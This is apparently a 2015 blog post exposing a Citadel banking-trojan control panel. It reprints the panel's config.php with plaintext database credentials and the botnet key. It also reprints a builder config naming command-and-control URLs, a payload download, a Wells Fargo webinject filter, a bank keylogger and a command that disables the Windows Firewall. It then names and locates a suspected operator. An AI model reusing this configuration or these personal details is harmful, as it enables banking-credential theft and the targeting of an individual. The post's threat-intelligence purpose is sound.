
Sunday, January 4, 2015

Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed



// config.php
// Leaked Citadel control-panel configuration (config.php), reproduced as posted.
// The "......" line further down is the post author's elision, not PHP.
// The file is meant to be include()d: it builds $config and returns it.
$config = array (
  // Panel-to-MySQL connection. The panel runs as the MySQL superuser with a
  // plaintext password, so anyone who can read this file has the whole database.
  'mysql_host' => 'localhost',
  'mysql_user' => 'root',
  'mysql_pass' => 'qwerty23456@',
  'mysql_db' => 'tenna',
  // Report storage. By name, reports go to the DB (1) and not the filesystem (0);
  // the _reports<digits> directory is still named here and reused for the jabber log.
  'reports_path' => '_reports1190699691',
  'reports_to_db' => 1,
  'reports_to_fs' => 0,
  'reports_geoip' => 0,
  // Jabber/XMPP notification target: every field is empty and reports_jn is 0,
  // so notifications look unconfigured.
  'jabber' => 
  array (
    'host' => '',
    'login' => '',
    'pass' => '',
    'port' => 5222,
  ),
  'reports_jn' => 0,
  'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
  // ^ elided by the post author; the "),"  below closes a nested array whose
  //   opening line is not shown.
  ),
  // Country allow-list is disabled (0) and empty.
  'allowed_countries_enabled' => 0,
  'allowed_countries' => '',
  'botnet_timeout' => 1500,   // unit not stated in this file
  // Shared secret the bots use to talk to the panel. Stored in plaintext, and it
  // does NOT match encryption_key in the builder config.txt shown further down
  // the page ('jzhbfgjdhbgjhddkjgskdj'); if the two must agree for bots to reach
  // gate.php, that config.txt was not built against this panel -- cannot confirm here.
  'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
// 256 byte values with several repeats (e.g. 114, 251), so this is not a byte
// permutation; presumably key material the panel derived from botnet_cryptkey
// -- TODO confirm against the panel code that consumes it.
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;


config.txt (builder input) — the plaintext Citadel builder configuration, presumably the source from which the builder produces the config.bin referenced by url_config1 below
; Citadel builder config.txt as posted. Lines starting with ';' are comments.
; StaticConfig is, by name, the part baked into the bot at build time;
; DynamicConfig below is presumably what the bot later fetches -- confirm.
entry "StaticConfig"
  botnet "CIT"
  ; Timers are given as value pairs; units are not stated in this file
  ; (presumably minutes, as in the ZeuS config format this follows -- confirm).
  timer_config 4 9
  timer_logs 3 6
  timer_stats 4 8
  timer_modules 1 4
  timer_autoupdate 8
  ; Where the bot fetches config.bin. Note the host is richyadams.zapto.org,
  ; not the cynthialemos1225.ddns.net name in the post title; both are
  ; dynamic-DNS names.
  url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
  
  remove_certs 1
  ; The next line is commented out with ';', so it has no effect here.
;  disable_tcpserver 0
  disable_cookies 0
  ; Bot<->panel shared secret. It differs from botnet_cryptkey in the leaked
  ; config.php above ('sgasgdsgdshwgrekhgjlksdng'); if the two must match,
  ; this config.txt was not built against that panel -- cannot confirm here.
  encryption_key "jzhbfgjdhbgjhddkjgskdj"
  report_software 1
  ; Luhn-10 (card-number checksum) filtering, by name: off for GET, on for POST.
  enable_luhn10_get 0
  enable_luhn10_post  1
  disable_antivirus 0
  ; Video capture module is on; its parameters are in the "Video" entry below.
  use_module_video 1
  antiemulation_enable 0
  disable_httpgrabber 0
  ; By name, the Firefox cookie-grabbing module.
  use_module_ffcookie 1
end
; DynamicConfig: by name, the part served to bots via config.bin rather than
; compiled in -- confirm. Every URL below sits under /xampp/link/ on the same
; host as url_config1; the /xampp/ path suggests a stock XAMPP install.
entry "DynamicConfig"
  url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
  ; By name (url_server), the bot's check-in endpoint. The access-log line
  ; lower on the page hits cp.php in this same /xampp/link/ directory, but on
  ; a different hostname.
  url_server "http://richyadams.zapto.org/xampp/link/gate.php"
  file_webinjects "injects.txt"
  url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
  ; The same config URL is listed twice.
  entry "AdvancedConfigs"
    "http://richyadams.zapto.org/xampp/link/config.bin"
 "http://richyadams.zapto.org/xampp/link/config.bin"
  end
  ; URL masks. The leading character selects the filter mode; the meanings are
  ; not documented in this file (in the ZeuS syntax this follows, '!' is
  ; presumably an exclusion -- confirm, and likewise for '#' and '@').
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "@*payment.com/*"
    "!http://*.com/*.jpg"
  end
  ; This entry name is unquoted, unlike every other entry on the page.
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "WebDataFilters"
  end
  entry "WebFakes"
  end
  ; Commands the bot is presumably instructed to run on the victim host.
  ; The first three are host recon; the last disables the Windows Firewall
  ; via netsh.
  entry "CmdList"
    "hostname"
    "tasklist"
    "ipconfig /all"
 "netsh firewall set opmode disable"
  end
  ; Keylogger scoped to these process names; the 'time' unit is not stated here.
  entry "Keylogger"
    processes "bank.exe;java.exe"
    time 3
  end
  ; Video capture settings (the module is enabled by use_module_video above).
  entry "Video"
    quality 1
    length 600
  end
end

Not many bots Richy ..

 // Panel access-log line. A 200 on cp.php?m=home with a cp.php referer is consistent with a logged-in control-panel session, but on its own it only shows that this address reached the panel — calling it the operator's IP assumes nobody else (e.g. researchers) did.
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"




His location, based on the IP — an approximation at best, since IP geolocation resolves to the provider's region rather than to a person.
and a photo attributed to him (the attribution is not verified here)




luv ur pix too !!
